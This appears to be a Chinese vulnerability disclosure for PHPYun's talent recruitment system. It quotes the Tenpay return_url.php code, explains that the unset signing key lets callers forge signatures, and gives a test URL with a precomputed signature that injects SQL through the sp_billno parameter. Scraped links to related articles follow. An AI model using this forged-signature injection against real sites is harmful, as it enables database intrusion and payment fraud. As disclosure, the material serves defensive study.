### 简要描述:

php云人才系统 注入漏洞

### 详细说明:

php云人才系统 注入漏洞

tenpay的KEY没有初始化

导致的注入漏洞!

```

/api/tenpay/return_url.php

require_once(dirname(dirname(dirname(__FILE__)))."/data/db.config.php");

require_once(dirname(dirname(dirname(__FILE__)))."/include/mysql.class.php");

$db = new mysql($db_config['dbhost'], $db_config['dbuser'], $db_config['dbpass'], $db_config['dbname'], ALL_PS, $db_config['charset']);

/* 密钥 */

$key =$tenpay[sy_tenpaycode];

//密钥没有定义

=========

tenpay_data.php

/*

* Created on 2012

* Link for shyflc@qq.com

* This PHPYun.Rencai System Powered by PHPYun.com

*/

$tenpaydata=array("sy_weburl"=>"http://www.job.com","sy_tenpayid"=>"","sy_tenpaycode"=>"")//没有定义KEY 所以是空~~

;

?>

=========

/* 创建支付应答对象 */

$resHandler = new PayResponseHandler();

$resHandler->setKey($key);//还是key没有初始化~~

//判断签名

if($resHandler->isTenpaySign()) {//验证过程

/**********************************3

function isTenpaySign() {

$cmdno = $this->getParameter("cmdno");

$pay_result = $this->getParameter("pay_result");

$date = $this->getParameter("date");

$transaction_id = $this->getParameter("transaction_id");

$sp_billno = $this->getParameter("sp_billno");

$total_fee = $this->getParameter("total_fee");

$fee_type = $this->getParameter("fee_type");

$attach = $this->getParameter("attach");

$key = $this->getKey();

$signPars = "";

//组织签名串

$signPars = "cmdno=" . $cmdno . "&" .

"pay_result=" . $pay_result . "&" .

"date=" . $date . "&" .

"transaction_id=" . $transaction_id . "&" .

"sp_billno=" . $sp_billno . "&" .

"total_fee=" . $total_fee . "&" .

"fee_type=" . $fee_type . "&" .

"attach=" . $attach . "&" .

"key=" . $key;

$sign = strtolower(md5($signPars));//key是空 其他都是可控 我们之间就可以生成key 所以验证形同虚设 没有设置key的时候

***********************************/

//交易单号

$transaction_id = $resHandler->getParameter("transaction_id");

//本站单号

$sp_billno = $resHandler->getParameter("sp_billno");

//金额,以分为单位

$total_fee = $resHandler->getParameter("total_fee");

//支付结果

$pay_result = $resHandler->getParameter("pay_result");

//类型

$attach = $resHandler->getParameter("attach");

if( "0" == $pay_result ) {

//------------------------------

//处理业务开始

//------------------------------

//注意交易单不要重复处理

//注意判断返回金额

//处理本站信息开始

echo "select * from `".$db_config["def"]."company_order` where `order_id`='$sp_billno'";

$sql=$db->query("select * from `".$db_config["def"]."company_order` where `order_id`='$sp_billno'");

$row=mysql_fetch_array($sql);

```

### 漏洞证明:

测试方法

http://127.0.0.1/yun3/api/tenpay/return_url.php?sign=ba7b763f604fb46432eac7fb601c55c1&sp_billno=1%27&pay_result=0

[](https://images.seebug.org/upload/201311/22174047d7b1300aa8b4cb2ab4c0ff13d0fe5f89.jpg)

php云人才系统漏洞,php云人才系统 注入漏洞相关推荐

  1. 【悟空云课堂】第十二期:LDAP注入漏洞(CWE-90: Improper Neutralization of Special Elements used in an LDAP Query)

    关注公众号"中科天齐软件安全中心"(id:woocoom),一起涨知识! 该栏目为中科天齐全新规划的悟空云课堂,每周五下午18:00准时上线,旨在科普软件安全相关知识,助力企业有效 ...

  2. php模板注入漏洞,74CMS前台模板引擎注入漏洞漏洞复现

    74CMS 曝高危漏洞,攻击者只需注册会员账号,上传一份包含恶意内容的简历,即可控制网站服务器,进行任意操作. 漏洞复现.jpg 74CMS 又称 "骑士 CMS ",是一项以 P ...

  3. Linux注入漏洞,phpBB多个SQL注入漏洞

    发布日期:2012-07-28 更新日期:2012-08-01 受影响系统: phpBB Group phpBB 描述: --------------------------------------- ...

  4. php mysql 注入漏洞_PHP安全:SQL注入漏洞防护

    原标题:PHP安全:SQL注入漏洞防护 SQL注入是最危险的漏洞之一,但也是最好防护的漏洞之一.本文介绍在PHP的编码中合理地使用MySQL提供的预编译进行SQL注入防护,在PHP中使用PHP数据对象 ...

  5. java 漏洞挖掘_Apache Tika命令注入漏洞挖掘

    *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 介绍 这篇文章将从一个Apache tika服务器的命令注入漏洞到完全利用的步骤. ...

  6. recommend.php sql注入漏洞,Espcms通杀SQL注入漏洞分析(附EXP)

    漏洞:Espcms 通杀 SQL注入漏洞分析附EXP 漏洞作者:Seay博客:www.cnseay.com 官网介绍: 易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操 ...

  7. php cve-2014-8142漏洞,Drupal 7.31 SQL注入漏洞(CVE-2014-3704) EXP测试代码

    *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 最近频繁爆发各种0day,真是把大家累坏了.Drupal 7.31 SQL注入漏洞 ...

  8. wordpress漏洞_WordPress站点恶意JS注入漏洞分析

    Sucuri的安全研究人员检测到攻击者利用Wordpress插件的漏洞进行攻击活动.该攻击活动中有超过2000个WordPress网站被黑,并重定向受害者到含有浏览器通知订阅.假的问卷调研和假的Ado ...

  9. 用友OA漏洞学习——test.jsp SQL注入漏洞

    警告 请勿使用本文提到的内容违反法律. 本文不提供任何担保 目录 警告 一.概述 二.影响版本 三.漏洞复现

  10. 致翔OA漏洞学习——msglog.aspx SQL注入漏洞

    警告 请勿使用本文提到的内容违反法律. 本文不提供任何担保 目录 警告 一.概述 二.影响版本 三.漏洞复现

最新文章

  1. 韵镖侠登录不上 显示无法连接到服务器,什么是韵镖侠?韵镖侠是做什么的?...
  2. 在线场景感知:图像稀疏表示-ScSPM和LLC总结(lasso族、岭回归)
  3. js_组合继承(最常用的继承方式)
  4. 阿里云峰会|阿里云数据中台重磅升级后拟扶持100万家企业数智化
  5. 计算机操作员初级 第1单元0202微型计算机基本操作 教学大纲,计算机操作员教学大纲...
  6. java类全路径简写_[JAVA] JAVA 类路径
  7. Linux学习总结(78)—— 常见开源协议讲解
  8. 将本地 jar 安装到本地 maven 仓库
  9. matlab跟maxwell联合优化,sim-sim-maxwell联合仿真遇到问题及解决方法
  10. 台达plc读取变频器电流案例_PLC模拟量信号如何转换,编程必懂!
  11. 如何获取美团外卖推广链接
  12. 【数据分析与娱乐八卦】从Python可视化图表中探究王心凌出圈的流量密码
  13. 用SNMP协议实现系统监控
  14. 深度学习--卷积神经网络
  15. 手机上网占多大流量?WiFi要不要进行限速?
  16. 【图像算法】pytesseract简单实现图片数字识别
  17. mysql盲注脱裤_记一次猥琐的脱裤
  18. stm32 usart的BRR寄存器的配置,程序是CMSIS中的,分析它是怎么实现的?(自己设置好波特率,库文件会根据波特率计算BRR的值,和以前STM8不一样,需要自己根据波特率计算BRR值再设置)
  19. TOC瓶颈管理理论/约束理论
  20. vrep导入urdf

热门文章

  1. 【FFmpeg】视频scale缩放之后尺寸与设置值不一致
  2. i.MX6q+QNX(学习笔记一)
  3. 2017第十四届广州国际乐器展览会会刊(参展商名录)
  4. 教你如何训练和提高自己的情商
  5. 用计算机怎样弄出告白密码,2019最火的表白密码 表白方式
  6. MT6765 CTP移植与调试
  7. InternetDownloadManager6.38.1(IDM)
  8. 在通达信服务接口手机软件如何使用自己的代码选股?
  9. 群晖Video station添加电影信息及海报
  10. android+更换sd卡,Android手机上如何无痛替换SD卡,扩展存储空间